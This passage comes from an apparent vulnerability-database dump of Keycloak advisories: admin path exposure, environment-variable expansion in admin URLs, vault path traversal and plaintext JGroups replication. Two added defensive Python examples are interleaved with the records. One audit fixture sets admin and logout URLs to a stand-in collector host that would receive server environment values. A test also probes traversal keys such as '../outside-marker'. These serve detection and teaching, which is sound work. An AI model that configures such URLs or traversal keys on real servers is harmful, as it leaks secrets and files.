url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
14
reference_url https://access.redhat.com/security/cve/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/security/cve/CVE-2024-9666
15
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
16
reference_url https://github.com/advisories/GHSA-jgwc-jh89-rpgq
reference_id GHSA-jgwc-jh89-rpgq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jgwc-jh89-rpgq
17
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-jgwc-jh89-rpgq
reference_id GHSA-jgwc-jh89-rpgq
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-jgwc-jh89-rpgq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-9666, GHSA-jgwc-jh89-rpgq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-azrr-bwad-97cs
5
url VCID-cax3-qsfb-yfc9
vulnerability_id VCID-cax3-qsfb-yfc9
summary
Duplicate Advisory: Keycloak allows access to admin path through flaw
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j4vq-q93m-4683. This link is maintained to preserve external references.

### Original Description
A flaw was found in Keycloak. The Keycloak guides recommend not exposing the /admin path to the outside when the installation sits behind a proxy. The issue occurs at least via HAProxy, which can be tricked into using relative/non-normalized paths to reach the /admin application path relative to /realms, which is expected to be exposed.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/issues/43763
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/43763
5
reference_url https://github.com/keycloak/keycloak/pull/43765
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/43765
6
reference_url https://access.redhat.com/security/cve/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2025-10939
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
8
reference_url https://github.com/advisories/GHSA-c6cm-5gc7-c3f4
reference_id GHSA-c6cm-5gc7-c3f4
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c6cm-5gc7-c3f4
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-wgaj-esqz-27fk
2
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
aliases GHSA-c6cm-5gc7-c3f4
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cax3-qsfb-yfc9
6
url VCID-hq42-c3pr-qkbf
vulnerability_id VCID-hq42-c3pr-qkbf
summary
Keycloak allows unrestricted admin use of system and environment variables
A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.
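An operator-side audit for this issue, as an added example (not Keycloak's code or its fix): scan a realm export for admin-configurable URLs carrying `${...}` placeholders, plus a validator that refuses such values on input. The field names (`rootUrl`, `baseUrl`, `adminUrl`, and the client attribute `backchannel.logout.url`) follow Keycloak's client representation as I understand it and should be checked against your own export; the realm JSON below is constructed.

```python
"""Added example (not Keycloak's code): audit a realm export for admin-
configurable URLs that carry `${...}` placeholders, and a validator to reject
such values when they are submitted.  Field names follow Keycloak's client
representation as assumed here (rootUrl/baseUrl/adminUrl and the client
attribute `backchannel.logout.url`); verify them against your own export."""
import json
import re

PLACEHOLDER = re.compile(r"\$\{[^}]*\}")
URL_FIELDS = ("rootUrl", "baseUrl", "adminUrl")
URL_ATTRIBUTES = ("backchannel.logout.url",)


def contains_placeholder(value) -> bool:
    """True if `value` is a string holding a `${...}` expansion marker."""
    return isinstance(value, str) and PLACEHOLDER.search(value) is not None


def validate_admin_url(value: str) -> str:
    """Input-side check: refuse URLs that would be expanded from environment
    variables or system properties instead of being used literally."""
    if contains_placeholder(value):
        raise ValueError(f"placeholder not allowed in URL: {value!r}")
    return value


def find_placeholders(realm: dict) -> list:
    """Return (clientId, field, value) for every URL field carrying a placeholder."""
    findings = []
    for client in realm.get("clients", []):
        cid = client.get("clientId", "<unknown>")
        for field in URL_FIELDS:
            if contains_placeholder(client.get(field)):
                findings.append((cid, field, client[field]))
        attrs = client.get("attributes") or {}
        for key in URL_ATTRIBUTES:
            if contains_placeholder(attrs.get(key)):
                findings.append((cid, "attributes." + key, attrs[key]))
    return findings


# Constructed realm export fragment, not from a real deployment.
SAMPLE_EXPORT = json.loads("""
{
  "realm": "example",
  "clients": [
    {"clientId": "web-app",
     "rootUrl": "https://app.example.test",
     "adminUrl": "https://app.example.test/k_admin",
     "attributes": {"backchannel.logout.url": "https://app.example.test/logout"}},
    {"clientId": "suspicious-app",
     "adminUrl": "https://collector.example.test/?h=${env.HOSTNAME}",
     "attributes": {"backchannel.logout.url": "https://collector.example.test/?d=${user.dir}"}}
  ]
}
""")

if __name__ == "__main__":
    for cid, field, value in find_placeholders(SAMPLE_EXPORT):
        print(f"{cid}: {field} = {value}")
```

Run it against `kc.sh export` output for each realm; any hit on an unpatched server is a configured exfiltration channel for whatever the placeholder names.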
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:0299
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/errata/RHSA-2025:0299
1
reference_url https://access.redhat.com/errata/RHSA-2025:0300
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/errata/RHSA-2025:0300
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11736.json
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11736.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-11736
reference_id
reference_type
scores
0
value 0.00027
scoring_system epss
scoring_elements 0.08215
published_at 2026-06-09T12:55:00Z
1
value 0.00027
scoring_system epss
scoring_elements 0.08256
published_at 2026-06-05T12:55:00Z
2
value 0.00027
scoring_system epss
scoring_elements 0.08269
published_at 2026-06-06T12:55:00Z
3
value 0.00027
scoring_system epss
scoring_elements 0.08247
published_at 2026-06-07T12:55:00Z
4
value 0.00027
scoring_system epss
scoring_elements 0.08196
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-11736
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2328850
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2328850
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
reference_id cpe:/a:redhat:build_keycloak:26.0
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
11
reference_url https://access.redhat.com/security/cve/CVE-2024-11736
reference_id CVE-2024-11736
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/security/cve/CVE-2024-11736
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-11736
reference_id CVE-2024-11736
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-11736
13
reference_url https://github.com/advisories/GHSA-f4v7-3mww-9gc2
reference_id GHSA-f4v7-3mww-9gc2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f4v7-3mww-9gc2
14
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2
reference_id GHSA-f4v7-3mww-9gc2
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-vtut-sg7s-xqf4
3
vulnerability VCID-wgaj-esqz-27fk
4
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
aliases CVE-2024-11736, GHSA-f4v7-3mww-9gc2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hq42-c3pr-qkbf
7
url VCID-msgd-763n-quhp
vulnerability_id VCID-msgd-763n-quhp
summary
Duplicate Advisory: Keycloak Path Traversal Vulnerability Due to External Control of File Name or Path
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5545-r4hg-rj4m. This link is maintained to preserve external references.

## Original Description
A vulnerability was found in Keycloak. A user with high privileges could read sensitive information from a Vault file that is not within the expected context. The attacker must already have high-privilege access to the Keycloak server in order to create resources, for example an LDAP provider configuration, and set up a Vault file read, which only reveals whether that file exists or not.
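The containment check a practitioner would want here, as an added example (not Keycloak's vault code): a vault key is resolved to a file only if the result stays inside the vault directory, and the decision is made before any filesystem access, so the lookup cannot serve as an existence oracle for arbitrary paths. The flat one-file-per-key layout and the constructed secret are assumptions for the demo.

```python
"""Added example (not Keycloak's code): resolve a vault key to a file while
guaranteeing the result stays inside the vault directory.  A key that walks
out of the directory is rejected before any filesystem access, so the lookup
cannot be used as an existence oracle for arbitrary paths.  The vault layout
(one flat directory, one file per key) is an assumption for this demo."""
import tempfile
from pathlib import Path
from typing import Optional


def resolve_vault_file(vault_dir: Path, key: str) -> Optional[Path]:
    """Return the file for `key`, or None if the key escapes `vault_dir`."""
    base = vault_dir.resolve()
    candidate = (base / key).resolve()  # absolute keys replace base, '..' walks up
    try:
        rel = candidate.relative_to(base)
    except ValueError:
        return None  # resolved outside the vault directory
    if len(rel.parts) != 1:
        return None  # flat layout: no subdirectories, no empty key
    return candidate


def read_secret(vault_dir: Path, key: str) -> Optional[str]:
    """Read a secret; rejected and missing keys get the same answer."""
    path = resolve_vault_file(vault_dir, key)
    if path is None or not path.is_file():
        return None
    return path.read_text()


def demo() -> dict:
    """Build a throwaway vault with one constructed secret and exercise the check."""
    vault = Path(tempfile.mkdtemp(prefix="vault-"))
    (vault / "master_ldap-bind").write_text("s3cr3t")
    outside = vault.parent / "outside-marker"
    outside.write_text("exists")  # a file a key must not be able to probe
    return {
        "valid": read_secret(vault, "master_ldap-bind"),
        "missing": read_secret(vault, "master_other"),
        "traversal": read_secret(vault, "../outside-marker"),
        "absolute": read_secret(vault, str(outside)),
        "traversal_rejected_before_io": resolve_vault_file(vault, "../outside-marker") is None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:30} {value!r}")
```

The point of returning None for both "rejected" and "missing" is that a caller cannot distinguish a file that exists outside the vault from one that does not exist at all.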
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322447
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2322447
5
reference_url https://access.redhat.com/security/cve/CVE-2024-10492
reference_id CVE-2024-10492
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10492
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10492
reference_id CVE-2024-10492
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10492
7
reference_url https://github.com/advisories/GHSA-6vrw-mpj8-3j59
reference_id GHSA-6vrw-mpj8-3j59
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6vrw-mpj8-3j59
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-6vrw-mpj8-3j59
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-msgd-763n-quhp
8
url VCID-pewx-mrx1-7ke6
vulnerability_id VCID-pewx-mrx1-7ke6
summary
Keycloak on Quarkus CLI option for encrypted JGroups ignored
The env option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work, and the JGroups replication configuration is always used in plaintext. This option worked in versions 22 and 24. More info in public issue https://github.com/keycloak/keycloak/issues/34644.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10973.json
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10973.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-10973
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.08963
published_at 2026-06-09T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.08985
published_at 2026-06-05T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09002
published_at 2026-06-06T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.08982
published_at 2026-06-07T12:55:00Z
4
value 0.0003
scoring_system epss
scoring_elements 0.08935
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-10973
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-18T16:25:38Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
5
reference_url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
6
reference_url https://github.com/keycloak/keycloak/issues/28750
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/28750
7
reference_url https://github.com/keycloak/keycloak/issues/34644
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/34644
8
reference_url https://github.com/keycloak/keycloak/pull/28756
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/28756
9
reference_url https://github.com/keycloak/keycloak/pull/34668
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/34668
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
13
reference_url https://access.redhat.com/security/cve/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-18T16:25:38Z/
url https://access.redhat.com/security/cve/CVE-2024-10973
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
15
reference_url https://github.com/advisories/GHSA-g6qq-c9f9-2772
reference_id GHSA-g6qq-c9f9-2772
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g6qq-c9f9-2772
16
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-g6qq-c9f9-2772
reference_id GHSA-g6qq-c9f9-2772
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-g6qq-c9f9-2772
fixed_packages
0
